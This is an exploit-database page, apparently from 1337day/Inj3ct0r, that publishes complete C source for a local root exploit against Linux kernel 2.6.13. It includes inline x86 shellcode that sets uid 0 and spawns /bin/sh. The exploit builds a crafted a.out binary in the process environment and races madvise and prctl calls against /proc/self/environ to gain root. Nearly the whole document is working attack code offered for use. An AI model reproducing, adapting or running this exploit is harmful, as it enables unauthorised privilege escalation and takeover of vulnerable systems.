Linux Kernel 2.6.13 Local root Exploit



EKU-ID: 1218 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-10-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#####################################################
# Title: Linux Kernel 2.6.13 Local root Exploit     #
# Author: Angel Injection                           #
# Home: http://1337day.com                          #
# Thanks To: Inj3ct0r Team                          #
#####################################################
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <linux/a.out.h>
#include <asm/unistd.h>


static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;


/*              shell code		*/
__asm__ ("	__excode:	call	1f			\n"
	 "	1:		mov	$23, %eax		\n"
	 "			xor	%ebx, %ebx		\n"
	 "			int	$0x80			\n"
	 "			pop	%eax			\n"
	 "			mov	$cmd-1b, %ebx		\n"
	 "			add	%eax, %ebx		\n"
	 "			mov	$arg-1b, %ecx		\n"
	 "			add	%eax, %ecx		\n"
	 "			mov	%ebx, (%ecx)		\n"
	 "			mov	%ecx, %edx		\n"
	 "			add	$4, %edx		\n"
	 "			mov	$11, %eax		\n"
	 "			int	$0x80			\n"
	 "			mov	$1, %eax		\n"
	 "			int	$0x80			\n"
	 "	arg:		.quad	0x00, 0x00		\n"
	 "	cmd:		.string		\"/bin/sh\"	\n"
	 "	__excode_e:	nop				\n"
	 "	.global		__excode			\n"
	 "	.global		__excode_e			\n"
	);



extern void (*__excode) (void);
extern void (*__excode_e) (void);


void
error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}


/*	exploit this shit	*/
void
exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf ("\ntrying to exploit %s\n\n", file);
  fflush (stdout);
  chmod ("/proc/self/environ", 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
  memset ((void *) c, 0, 4096);

  /*      slow down machine       */
  fd = open (file, O_RDONLY);
  fstat (fd, &st);
  p =
    (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
    error ("mmap");
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, "/proc/%d/environ", getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*      give it a try           */
  if (i)
    {		    
      (*c)++;
      !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
      prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
      sched_yield ();	
    }
  else
    {
	    nice(10);
	    while (!(*c));
		sched_yield ();
      execve (t, a, e);
      error ("failed");
    }

  waitpid (i, NULL, 0);
  exit (0);
}


int
main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac < 2)
    error ("usage: binary <big file name>");
  if (ac > 2)
    exploit (av[2]);
  printf ("\npreparing");
  fflush (stdout);

  /*      make setuid a.out       */
  memset (&ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) &__excode_e) - (unsigned) &__excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, &ex, sizeof (ex));
  memcpy (b + sizeof (ex), &__excode, s);

  /*      make environment        */
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i < s; i++)
    {
      if (!p[i])
	{
	  e[j++] = &p[k];
	  k = i + 1;
	}
    }

  /*      reexec                  */
  getcwd (t, sizeof (t));
  strcat (t, "/");
  strcat (t, av[0]);
  execve (t, a, e);
  error ("execve");
  return 0;
}